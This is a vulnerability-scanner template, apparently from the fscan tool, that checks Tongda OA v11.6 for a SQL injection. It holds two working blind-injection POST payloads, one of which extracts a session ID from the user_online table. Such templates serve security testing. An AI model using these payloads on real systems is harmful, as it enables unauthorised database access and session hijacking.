mirror of https://github.com/qwqdanchun/fscan.git
22 lines
1.1 KiB
YAML
22 lines
1.1 KiB
YAML
|
name: tongda-insert-sql-inject
|
|||
|
rules:
|
|||
|
- method: POST
|
|||
|
path: /general/document/index.php/recv/register/insert
|
|||
|
body: |
|
|||
|
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
|
|||
|
expression: response.status == 302 && response.headers["set-cookie"].contains("PHPSESSID=")
|
|||
|
- method: POST
|
|||
|
path: /general/document/index.php/recv/register/insert
|
|||
|
body: |
|
|||
|
title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=
|
|||
|
expression: response.status != 502 && response.status != 500
|
|||
|
detail:
|
|||
|
author: zan8in
|
|||
|
description: |
|
|||
|
通达OA v11.6 insert参数包含SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息
|
|||
|
app="TDXK-通达OA"
|
|||
|
发送请求包判断漏洞 /general/document/index.php/recv/register/insert 返回302则是存在漏洞,返回500则不存在
|
|||
|
links:
|
|||
|
- http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
|
|||
|
- https://blog.csdn.net/weixin_39779975/article/details/111091529
|